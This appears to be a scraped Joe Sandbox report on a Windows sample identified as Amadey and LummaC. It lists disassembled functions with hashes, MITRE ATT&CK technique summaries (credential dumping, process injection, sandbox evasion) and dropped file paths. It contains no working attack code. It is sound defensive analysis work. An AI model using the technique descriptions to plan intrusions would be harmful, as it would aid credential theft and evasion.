Instruction ID: 8e15795cd310ac5966c787f2b256dc24001b48e88297475a159e205a08b3c1f1
Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
Instruction Fuzzy Hash: B821F223302A8089EB55AF26E85576E66D4FB86B95F5CC4A4EF2D1B380DF748845C312

Function 00B54B58 Relevance: 5.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B54BA5
free.MSVCRT ref: 00B54BAD
memmove.MSVCRT ref: 00B54BEA
free.MSVCRT ref: 00B54BF2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
Instruction ID: 8a304f914227a2da0acc515b5676a194c3c3f32d50a0d44a7d95918858d85ca4
Opcode Fuzzy Hash: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
Instruction Fuzzy Hash: 8F21B737712A9446CB11DF2AD51032973A1E785FEAB1882E4DF6D1B398DF38C886C750

Function 00B67780 Relevance: 5.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B6779B
LeaveCriticalSection.KERNEL32 ref: 00B677A7
EnterCriticalSection.KERNEL32 ref: 00B6783C
LeaveCriticalSection.KERNEL32 ref: 00B67848

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
Instruction ID: a32847f236a4d0d4cbf9ad5f519a60e3644b701ccff05119d2e4fa91c45d1f92
Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
Instruction Fuzzy Hash: 60212327704B4097CB209F2AE98426933B0FB48B98F285122EF4E87B14DF38D8A5C700

Function 00B7E7A0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

free.MSVCRT ref: 00B7E81E
free.MSVCRT ref: 00B7E828
free.MSVCRT ref: 00B7E832
free.MSVCRT ref: 00B7E83C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmalloc
String ID:
API String ID: 2043655614-0
Opcode ID: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
Instruction ID: 41acd0f0226c4fc4d5cf8c8e76de7998f1d809f55b893d5248c8a254361894c6
Opcode Fuzzy Hash: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
Instruction Fuzzy Hash: BF114F62612B8081CA60DF65D88131E73E5EB99BE4F2082A6ABBD17768DF34C855CB40

Function 00B975A4 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B975CF
memcmp.MSVCRT ref: 00B975EA
memcmp.MSVCRT ref: 00B97600

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
Instruction ID: fa8ec5340352e96c22965deffa74115180eefc47324709767a383a60ab910941
Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
Instruction Fuzzy Hash: EB01D2B2399B5145EF049F2A9C623A833D5DB5AFC5F8944718E059B301EF38D946C314

Function 00B7C8E8 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B7C913
memcmp.MSVCRT ref: 00B7C92E
memcmp.MSVCRT ref: 00B7C944

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
Instruction ID: 93a2e2004d5ca49f7d292d06cb99744d2592b0a21af2ceae7feeba90463f4b78
Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
Instruction Fuzzy Hash: 7D01DEB230471181EB059F22EC523A837959B0AFD5F88C0B9CF1AAB302EF38DA55C304

Function 00B63A0C Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B63A37
memcmp.MSVCRT ref: 00B63A4D
memcmp.MSVCRT ref: 00B63A69
memcmp.MSVCRT ref: 00B63A85

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
Instruction ID: b51f93a9172994c592e0e249ec748c90a9c484fbb1e6ccdaa78af6c01057596a
Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
Instruction Fuzzy Hash: 9701C0A230475191EF04DB669C623A823E59B0AFD5F8894A1CE4A97306EB38CA46D304

Function 00B7CE98 Relevance: 5.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B7CEC3
memcmp.MSVCRT ref: 00B7CED9
memcmp.MSVCRT ref: 00B7CEF5
memcmp.MSVCRT ref: 00B7CF11

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
Instruction ID: 3f34f81f29d0b1d7da06ea068fb3d1cf05c050ca54be7c78ce30cd68c768be72
Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
Instruction Fuzzy Hash: 5501C4A230475091EB04DF269C523A42792970AFD5F849479CE199B305EF34D949C304

Function 00B5538C Relevance: 5.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B553E6
free.MSVCRT ref: 00B553EE
free.MSVCRT ref: 00B553FA
free.MSVCRT ref: 00B55402

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
Instruction ID: 1ca1aede9f3dde87c264c66d4e41953fa4e7ba209b98f59007cc65ef21018cc2
Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
Instruction Fuzzy Hash: 1301B563312DC4849531AE57DC9072B6654EB42BE771D41D5EF2D0B350DF60C84BC700

Function 00B71474 Relevance: 5.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B714A6
free.MSVCRT ref: 00B714AF
free.MSVCRT ref: 00B714B8
free.MSVCRT ref: 00B714C0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
Instruction ID: d7e44adb693a6f9ed0a52f544fa2a74f5d824cb01966303e2adf91bd87e4f772
Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
Instruction Fuzzy Hash: 29F05E53713994898A10AF2ADC9126923A4AF56BAAB1C45F1EF2D1B754EE20CC568B10

Function 00B97968 Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B9799B
free.MSVCRT ref: 00B979A4
free.MSVCRT ref: 00B979AC
free.MSVCRT ref: 00B979B9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
Instruction ID: e1ab641e5c735128efafe23a7af81fcf94d86aaf2cbccfe677ba7665c1c55eca
Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
Instruction Fuzzy Hash: D1F0BE13B539809A8A10AF37EC9026963A0FB47BA670C01F1EF1D1BB44DE20C8668700

Function 00B70BBC Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B70BCC
free.MSVCRT ref: 00B70BD5
free.MSVCRT ref: 00B70C00
free.MSVCRT ref: 00B70C08

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
Instruction ID: 7b8d88ca5e66cb90256c2f4c84e0c06b0c2d1c6ecf0349a832bd644e1389896c
Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
Instruction Fuzzy Hash: C5F05413713C8489C611AF36DC512695360DB96FD6B1D82E29F2D1B355DE24C8468700

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

C:\Program Files\Windows Media Player\graph\graph.exe

C:\ProgramData\KXBASJECBA1V\3790H4

C:\ProgramData\KXBASJECBA1V\3E3OP8QIM

C:\ProgramData\KXBASJECBA1V\6FUKNY

C:\ProgramData\KXBASJECBA1V\6PHDT2

C:\ProgramData\KXBASJECBA1V\8YMO89

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

